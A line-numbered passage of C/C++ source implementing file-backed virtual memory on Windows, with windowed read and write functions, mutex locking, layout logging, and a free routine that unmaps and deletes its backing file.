177                 vm.tbl.at(vm_index).window.p = p;
178 
179                 return p + tmp_offset;
180         }
181 
182         return NULL;
183 }
184 
185 int vm_write(vm_ptr_t pointer, const unsigned char *buff, unsigned long long size)
186 {
187         int             ret;
188         unsigned char       *p;
189         unsigned long       len;
190         int index = in_region(pointer, size);
191 
192         ret = 0;
193 
194         if (index == -1) {
195                 ret = -1;
196                 goto end;
197         }
198         WaitForSingleObject(vm.tbl.at(index).mutext, 20000);        /* timeout 10s */
199         while (size) {
200                 len = (unsigned long)min(size, VM_WINDOW_SIZE);
201                 p = scroll_window(index, pointer, len);
202                 if (!p) {
203                         ret = -1;
204                         goto end;
205                 }
206 
207                 memcpy(p, buff, len);
208 
209                 pointer += len;
210                 buff += len;
211                 size -= len;
212         }
213 end:
214         ReleaseMutex(vm.tbl.at(index).mutext);
215         return ret;
216 }
217 
218 
219 int vm_read(unsigned char *buff, vm_ptr_t ptr, unsigned long long size)
220 {
221         unsigned char   *p;
222         unsigned long   len;
223         int index;
224 
225         assert(buff);
226 
227         index = in_region(ptr, size);
228 
229         if (index == -1)
230                 return -E_ALLOC_MEMORY_FAIL;
231 
232         while (size) {
233                 len = (unsigned long)min(size, VM_WINDOW_SIZE);
234                 p = scroll_window(index, ptr, len);
235                 if (!p)
236                         return -1;
237 
238                 memcpy(buff, p, len);
239 
240                 ptr += len;
241                 buff += len;
242                 size -= len;
243         }
244 
245         return 0;
246 }
247 
248 int vm_free(vm_ptr_t ptr)
249 {
250     int i;
251 
252     LOG_BEGIN {
253                 log_add("----------------------------------------------");
254                 log_add("|             Virtual Memory layout          |");
255                 log_add("|--------------------------------------------|");
256                 for (i = 0; i < (int)vm.tbl.size(); i++)
257                 log_add("|window.start_addr:%llx | window.size:%llx   |", vm.tbl.at(i).window.start, vm.tbl.at(i).window.size);
258                 log_add("----------------------------------------------");
259     } LOG_END;
260 
261     for (i = 0; i < (int)vm.tbl.size(); i++) {
262         if (vm.tbl.at(i).vm_start_ptr == ptr) {
263             assert(vm.tbl.at(i).hMap);
264 
265             UnmapViewOfFile(vm.tbl.at(i).window.p);
266             CloseHandle(vm.tbl.at(i).hMap);
267 
268             DeleteFile(vm.tbl.at(i).file_path);
269 
270             vm.tbl.erase(vm.tbl.begin() + i);
271             return 0;
272         }
273     }
274 
275     assert(!"Invalid pointer");
276 
277     return 0;
278 }